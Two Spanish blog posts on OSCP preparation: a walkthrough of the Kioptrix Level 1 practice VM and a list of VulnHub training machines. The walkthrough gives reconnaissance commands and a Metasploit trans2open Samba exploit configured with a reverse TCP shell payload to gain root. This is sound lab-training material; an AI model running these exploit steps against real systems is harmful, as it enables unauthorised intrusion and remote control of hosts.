Kioptrix Level 1

by Pablo Gutierrez | Mar 28, 2018 | oscp, retos, whitesuit

Esta máquina Kioptrix VM es un desafío fácil. El objetivo del es adquirir acceso root a través de cualquier medio El objetivo de estos es aprender las herramientas y técnicas básicas para evaluar y explotar la vulnerabilidad. Hay más de una forma en la que se puede completar con éxito el desafío.

Una vez iniciada la maquina nos aparecerá algo como esto:

Como debe de ser una simulación lo mas cercano a una prueba, empezamos buscando la ip de la maquina con el comando

Netdiscover

Como estoy en un ambiente de vmware puedo ver que la ip que corresponde a kioptrix es la 192.168.1.104, ahora necesitamos saber que puertos tiene abiertos o que esta corriendo.

Nmap 192.168.1.104

Una vez que tenemos una idea de que esta corriendo, tenemos varias formas de intentar acceder, despues de checar el puerto 80 no encontre nada, asi que mi segunda opcion es ver que hay en el puerto 139 de Samba.

Smbclient -L  192.168.1.104

Despues de ejecutarlo, se puede ver que tiene samba usa 2.2.1ª, al buscar un poco en google encontre que hay un modulo de metasploit con el cual puedo hacer rce, a esa version, despues de inciar metasploit y configurarlo.

Search trans2open

Use exploit/linux/samba/trans2open

set PAYLOAD linux/x86/shell/reverse_tcp

Set RHOST 192.168.1.104

Set LHOST 192.168.1.69

Una vez terminado, al ponerle exploit, me genera una shell reversa sobre la maquina vulnerable, despues de buscar un rato la bandera la he encontrado en

cat /var/mail/root

Y listo, tenemos la bandera y así es como se termina esta maquina Kioptrix Level 1.

Maquinas Vulnerables de Práctica para el OSCP

by Pablo Gutierrez | Mar 24, 2018 | hacking, oscp, whitesuit

Offensive Security Certified Professional (OSCP) es una certificación que se enfoca en habilidades prácticas de seguridad ofensiva. Consta de dos partes: un examen de examen practico de casi 24 horas y un informe de documentación que debe realizarse 24 horas después.

Como tal mucha gente no sabe por donde empezar para preparase, como toda la certificación es mas practica que teórica he decidió empezar a prepararme, vulnerando maquinas virtuales de prueba , estilo CaptureTheFlag, para ampliar mi conocimiento y estar listo para la certificación.

Aquí un listado de las mas comunes para empezar, para después de haber hecho cada una de ellas ir a HackTheBox

Kioptrix: Level 1 (#1) https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

Kioptrix: Level 1.1 (#2) https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

Kioptrix: Level 1.2 (#3) https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

Kioptrix: Level 1.3 (#4) https://www.vulnhub.com/entry/kioptrix-level-13-4,25/

Kioptrix: 2014 https://www.vulnhub.com/entry/kioptrix-2014-5,62/

FristiLeaks: 1.3 https://www.vulnhub.com/entry/fristileaks-13,133/

Stapler: 1 https://www.vulnhub.com/entry/stapler-1,150/

VulnOS: 2 https://www.vulnhub.com/entry/vulnos-2,147/

SickOs: 1.2 https://www.vulnhub.com/entry/sickos-12,144/

Brainpan: 1https://www.vulnhub.com/entry/brainpan-1,51/

HackLAB: Vulnix https://www.vulnhub.com/entry/hacklab-vulnix,48/

/dev/random: scream https://www.vulnhub.com/entry/devrandom-scream,47/

pWnOS: 2.0 https://www.vulnhub.com/entry/pwnos-20-pre-release,34/

SkyTower: 1 https://www.vulnhub.com/entry/skytower-1,96/

Mr-Robot: 1 https://www.vulnhub.com/entry/mr-robot-1,151/

PwnLab: init https://www.vulnhub.com/entry/pwnlab-init,158/

IMF https://www.vulnhub.com/entry/imf-1,162/

Iré publicando como resolver cada una de ellas a mi manera, se que en internet hay ya varios foros y blogs de como hacerlo, pero aquí el punto es aprender y prepararme mas.